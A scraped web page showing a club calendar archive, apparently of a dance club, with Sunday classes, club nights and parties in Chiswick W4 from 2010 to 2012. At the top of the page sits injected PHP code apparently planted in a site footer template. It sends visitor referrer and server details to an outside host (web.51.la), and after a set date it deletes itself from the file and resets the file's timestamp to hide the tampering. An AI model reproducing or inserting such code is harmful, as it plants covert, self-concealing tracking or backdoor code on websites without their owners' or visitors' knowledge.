check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456738141){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Club Calendar - Archive

Show EventsPrint

Club Calendar - Archive

  
 
Date Title Venue
Sun 10-Oct-2010 Club Night St Michael & All Angels Church Hall W4
Sun 17-Oct-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 24-Oct-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 31-Oct-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 7-Nov-2010 Club Night with Ian Cutts St Michael & All Angels Church Hall W4
Sun 14-Nov-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 21-Nov-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 28-Nov-2010 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 5-Dec-2010 Kilts & Posh Frocks IX - Band: David, Ian & Heulwen Hall St Michael & All Angels Church Hall W4
Sun 12-Dec-2010 Club Christmas Party - Band: Peter Jenkins & Tom Cooper St Michael & All Angels Church Hall W4
Sun 9-Jan-2011 Class & Social Dancing - Term Starts St Michael & All Angels Church Hall W4
Sun 16-Jan-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 23-Jan-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 30-Jan-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 6-Feb-2011 Club Night with live music by Ken Martlew & Ian Cutts St Michael & All Angels Church Hall W4
Sun 13-Feb-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 20-Feb-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 27-Feb-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 6-Mar-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 13-Mar-2011 Club Night with live music by Ken Martlew & Barbara Manning St Michael & All Angels Church Hall W4
Sun 20-Mar-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 27-Mar-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 3-Apr-2011 Class, AGM & Social Dancing St Michael & All Angels Church Hall W4
Sun 10-Apr-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 17-Apr-2011 Easter Dance with live music by Dave Hall & Christina Hood - Ticket only St Michael & All Angels Church Hall W4
Sun 8-May-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 15-May-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 22-May-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 29-May-2011 Class & Social Dancing St Michael & All Angels Church Hall W4
Sun 5-Jun-2011 Club Night with live music by David Hall St Michael & All Angels Church Hall W4
Sun 12-Jun-2011 Class & Social Dancing, Practice for Midsummer Magic Catholic Centre, 2 Dukes Avenue W4
Sun 19-Jun-2011 Class & Social Dancing, Practice for Midsummer Magic Catholic Centre, 2 Dukes Avenue W4
Sun 26-Jun-2011 Class & Social Dancing, Practice for Midsummer Magic Catholic Centre, 2 Dukes Avenue W4
Sun 3-Jul-2011 Midsummer Magic; Open Air Dance & Picnic with Live Music by Frank Reid Chiswick House
Sun 3-Jul-2011 Class & Social Dancing, Practice for Midsummer Magic Catholic Centre, 2 Dukes Avenue W4
Sun 11-Sep-2011 Open Air event at Chiswick House Chiswick House - Northern Walled Garden
Sun 25-Sep-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 2-Oct-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 9-Oct-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 16-Oct-2011 Club Night St Michael & All Angels Church Hall W4
Sun 23-Oct-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 30-Oct-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 6-Nov-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 13-Nov-2011 Club Night St Michael & All Angels Church Hall W4
Sun 20-Nov-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 27-Nov-2011 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 4-Dec-2011 Club Christmas Party St Michael & All Angels Church Hall W4
Sun 11-Dec-2011 Kilts & Posh Frocks X St Michael & All Angels Church Hall W4
Sun 8-Jan-2012 Classes and Social Dancing St Michael & All Angels Church Hall W4
Sun 15-Jan-2012 Classes and Social Dancing St Michael & All Angels Church Hall W4

Page 1 of 6